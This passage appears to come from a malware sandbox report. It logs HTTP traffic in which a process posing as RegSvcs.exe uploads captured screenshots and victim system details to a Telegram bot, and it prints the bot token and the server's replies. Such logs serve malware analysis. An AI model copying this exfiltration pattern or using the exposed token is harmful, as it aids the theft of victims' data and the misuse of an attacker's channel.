                                                                                      2024-12-06 04:54:24 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:54:24 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:54:24 UTC1358OUTData Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4
                                                                                      Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
                                                                                      2024-12-06 04:54:24 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 62 38 63 66 32 39 62 62 65 35 63 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd6b8cf29bbe5c--
                                                                                      2024-12-06 04:54:24 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:54:25 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:54:25 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170414,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460865,"document":{"file_name":"user-610930 2025-03-25 11-05-26.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZrmdSg4FlqTkFXo3slAL2WZQh6WY2AAL7FAACOh6ZUsML3VQ1iq97AQAHbQADNgQ","file_unique_id":"AQAD-xQAAjoemVJy","file_size":12290,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZrmdSg4FlqTkFXo3slAL2WZQh6WY2AAL7FAACOh6ZUsML3VQ1iq97AQAHbQADNgQ","file_unique_id":"AQAD-xQAAjoemVJy","file_size":12290,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECma5nUoOBZak5BV6N7JQC9lmUIelmNgAC-xQAAjoemVLDC91UNYqvezYE","file_unique_id":"AgAD-xQAAjoemVI","file_size":66323},"caption":"New SC Recovered!\n\nTime: 03/25/2025 10:45:26\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.450031149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:54:31 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd6fcfbb3027c3
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66944
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:54:31 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 66 63 66 62 62 33 30 32 37 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 66 63 66 62 62 33 30 32 37 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 33 30 2f 32 30 32 35 20 32 31 3a 30 33 3a 32 37 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd6fcfbb3027c3Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6fcfbb3027c3Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/30/2025 21:03:27User
                                                                                      2024-12-06 04:54:31 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:54:31 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:54:31 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:54:31 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:54:31 UTC1358OUTData Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4
                                                                                      Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
                                                                                      2024-12-06 04:54:31 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 66 63 66 62 62 33 30 32 37 63 33 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd6fcfbb3027c3--
                                                                                      2024-12-06 04:54:32 UTC25INHTTP/1.1 100 Continue


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.450032149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:54:33 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd725dd3d8b1e0
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66944
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:54:34 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 32 35 64 64 33 64 38 62 31 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 32 35 64 64 33 64 38 62 31 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 30 33 2f 32 30 32 35 20 30 33 3a 31 35 3a 34 35 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd725dd3d8b1e0Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd725dd3d8b1e0Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/03/2025 03:15:45User
                                                                                      2024-12-06 04:54:34 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:54:34 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:54:34 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:54:34 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:54:34 UTC1358OUTData Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4
                                                                                      Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
                                                                                      2024-12-06 04:54:34 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 32 35 64 64 33 64 38 62 31 65 30 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd725dd3d8b1e0--
                                                                                      2024-12-06 04:54:34 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:54:35 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:54:34 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170416,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460874,"document":{"file_name":"user-610930 2025-04-03 03-15-46.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZsGdSg4pTRa53_U4dSdGmtj_a_NguAAL9FAACOh6ZUjveaZL2PionAQAHbQADNgQ","file_unique_id":"AQAD_RQAAjoemVJy","file_size":12290,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZsGdSg4pTRa53_U4dSdGmtj_a_NguAAL9FAACOh6ZUjveaZL2PionAQAHbQADNgQ","file_unique_id":"AQAD_RQAAjoemVJy","file_size":12290,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmbBnUoOKU0Wud_1OHUnRprY_2vzYLgAC_RQAAjoemVI73mmS9j4qJzYE","file_unique_id":"AgAD_RQAAjoemVI","file_size":66323},"caption":"New SC Recovered!\n\nTime: 04/03/2025 03:15:45\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.450034149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:54:38 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd7790d94bd903
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 68584
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
